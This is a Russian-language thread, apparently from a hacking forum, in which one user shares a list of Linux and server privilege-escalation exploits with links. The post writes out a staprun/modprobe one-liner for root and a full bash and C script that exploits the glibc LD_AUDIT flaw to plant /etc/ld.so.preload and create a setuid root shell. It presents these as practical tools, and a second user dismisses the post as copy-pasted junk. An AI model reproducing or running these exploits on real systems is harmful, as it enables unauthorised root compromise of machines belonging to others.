zm1 0 Жалоба Опубликовано 11 июля, 2016 Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit http://www.exploit-db.com/exploits/15944/ Linux Kernel CAP_SYS_ADMIN (32 and 64-bit) Kernel Version >= 2.6.34 (untested on earlier versions) Published: 2011-01-08 >>> http://forum.exploit.in/index.php?showtopic=43395 КАП_СИС трудно эксплуатировать. #Exim 4.63 (Почта) RedHat/Centos/Debian Remote Root http://www.exploit-db.com/exploits/15725/ Ещё и в Метасплоите >>> http://forum.exploit.in/index.php?showtopic=42627 В декабре 2010 был эффективным, но своё уже отжил. Примечательно что это remote root. 27-го Ноября 2010 был опубликован следующий эксплоит. Ввиду лёгкой эксплуатации и широкой распространнёности, он является очень полезным. Какие версии уязвимы - неясно, но проверить конкретную машину очень легко. Код printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u [имя пользователя] >>> http://forum.exploit.in/index.php?showtopic=41867 ProFTPD 'mod_sql' < 1.3.3.D Published: 2010-11-18 http://www.securityfocus.com/bid/44933/references ProFTPD < 1.3.3.B Published: 2010-11-07 http://www.exploit-db.com/exploits/15449/ Linux Kernel <= 2.6.36-rc8 RDS x86 http://www.exploit-db.com/exploits/15285/ CVE: 2010-3904 Published: 2010-10-19 >>> http://forum.exploit.in/index.php?showtopic=40594 FreeBSD mbufs() v.7.0-8.* 26.09.2010 >>> http://forum.exploit.in/index.php?showtopic=39835 http://forum.exploit.in/index.php?sh...p;#entry289911 glibc эксплоит > Ввиду лёгкой эксплуатации и широкой распространнёности, он является очень полезным. отнюдь не широкой. емнип systemtap-runtime по дефолту ставят только в редхате, а на 90% серверов с центосью и подобными rpm-based дистрами этот staprun не установлен. и, как обычно, в зузе оно не работает, и не работало даже на момент выхода ыксплоета > glibc эксплоит для старого бебиана (вроде <=5.0.5) вот этот удобнее: #!/bin/bash OUTPUT=/etc/ld.so.preload MASK='umask' umask 0 LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null if [ ! -f $OUTPUT ]; then echo "System does not appear to be vulnerable" exit 0 fi echo -n > $OUTPUT umask $MASK cat > sh.c << EOF #include <unistd.h> #include <stdio.h> int main (int argc, char **argv, char **envp) { char *args[] = { "/bin/sh", NULL }; setuid(geteuid()); setgid(getegid()); execve(args[0], args, envp); perror("execve failed"); return 0; } EOF gcc sh.c -o sh cat > libpwn.c << EOF #include <sys/stat.h> #include <unistd.h> uid_t getuid (void) { chown("$PWD/sh", 0, 0); chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_ IROTH|S_IXOTH); return 0; } EOF gcc -Wall -fPIC -c libpwn.c gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o echo "$PWD/libpwn.so" > $OUTPUT ping 2> /dev/null echo -n > $OUTPUT ./sh этот ^^^ сплоент для debian-based дистров! Статья не моя копиаст с експлоита ) Поделиться сообщением Ссылка на сообщение
kibersila 0 Жалоба Опубликовано 11 июля, 2016 Ну что это капипаст это ежу понятно и нахера такою бесполезную хрень выкладывать Те кто шарят в эксплойтах без проблем любой сплойт на любом языке юзают с баг трекеров Те кто шарят в метасплойте им тем более эти эксплойты не нужны так как давно уже есть в в базе сплойтов к чему этот шлак здесь ПРЕДЛАГАЮ ДАБЫ НЕ ЗАСОРЯТЬ ФОРУМ НАЧИСЛЯТЬ ШТРАФНЫЕ БАЛЫ ЗА РАЗМЕЩЕНИЕ ТОКОГО МУСОРНОГО МАТ И ПО НАБОРУ БАЛОВ БАНАН ЧТОБЫ НЕ ГАДИЛИ БЕСТОЛКУ КТО ЗА ПЛЮСУЕМ Поделиться сообщением Ссылка на сообщение